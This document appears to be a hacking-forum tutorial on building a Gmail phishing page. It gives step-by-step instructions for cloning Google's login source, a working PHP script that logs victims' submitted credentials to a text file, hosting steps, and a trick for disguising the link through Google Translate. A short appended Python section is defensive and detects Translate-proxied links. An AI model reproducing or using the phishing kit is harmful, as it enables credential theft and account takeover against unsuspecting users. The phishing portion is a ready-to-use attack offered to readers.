It also plays on human psychology, because the domain appears to be a trusted one that you would visit regularly. This kind of phishing lets attackers steal credentials in plain text, and with this method they likely do so without anyone realizing.
Requirements
- A webhosting account
- cPanel access to the webhost
Step 1 Create a Gmail Phishing Page
First, we need to make a phishing page to prepare.
- Open up a text document using notepad, or your choice in text editors.
- Go to the Google login page.
- Right-click somewhere on the page, and click View page source.
- Copy all of the contents of the source code and paste them into your text document.
- Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
- Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
- Make a new text file, and paste the below as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
<?php
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
- Log in to your hosting account, and upload both files to the root of your website (not in a folder).
- When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.
Step 2 Manipulating Google
How exactly does the manipulation work behind this? Google Translate. Google Translate has a vulnerability: if an attacker creates a fake Gmail login page and then translates it with the tool, they get a perfectly crafted link masked by Google itself. Check out this URL for an example of a phishing page that was created and then masked after using the translation tool. This fools users into thinking the page is legit. I mean, look at the URL:
- Go to Google translate.
- Translate your page from a different language into English.
- Click the link and test.
See how frighteningly easy it is to manipulate a website even as large as Google? Keep safe by always analyzing that URL.
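That URL analysis can be automated in a mail filter or web proxy. The following is an added example, not code from the original post: it unwraps a Google Translate link to the host that actually serves the page. The proxy host names, the use of the `u` parameter, the hyphen decoding for `translate.goog` hosts and the sample URLs are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hosts treated as the translation proxy (assumption; extend for local needs).
PROXY_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}
PROXY_SUFFIX = ".translate.goog"

# Constructed sample links; "login-check.example" is a placeholder host.
SAMPLES = [
    "https://translate.google.com/translate?sl=auto&tl=en"
    "&u=http://login-check.example/index.php",
    "https://login--check-example.translate.goog/index.php?_x_tr_sl=auto",
    "https://accounts.google.com/ServiceLogin",
]


def real_origin(url):
    """Return the host actually serving the content, or None if not proxied."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in PROXY_HOSTS:
        # Wrapper form: the translated page is carried in the "u" parameter.
        target = parse_qs(parts.query).get("u", [None])[0]
        if not target:
            return None
        if "://" not in target:
            target = "http://" + target
        return (urlsplit(target).hostname or "").lower() or None
    if host.endswith(PROXY_SUFFIX):
        # Subdomain form: "." is assumed encoded as "-" and "-" as "--".
        label = host[: -len(PROXY_SUFFIX)]
        return re.sub(r"-(-)?", lambda m: "-" if m.group(1) else ".", label)
    return None


def verdict(url):
    """Classify a link the way a mail filter or proxy rule might."""
    origin = real_origin(url)
    if origin is None:
        return "direct"
    if origin == "google.com" or origin.endswith(".google.com"):
        return "proxied-google"
    return "proxied-third-party:" + origin


if __name__ == "__main__":
    for sample in SAMPLES:
        print(verdict(sample), sample)
```

A login form whose verdict is `proxied-third-party` is being served by the named host, whatever the address bar suggests.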
#!13lackD3M0n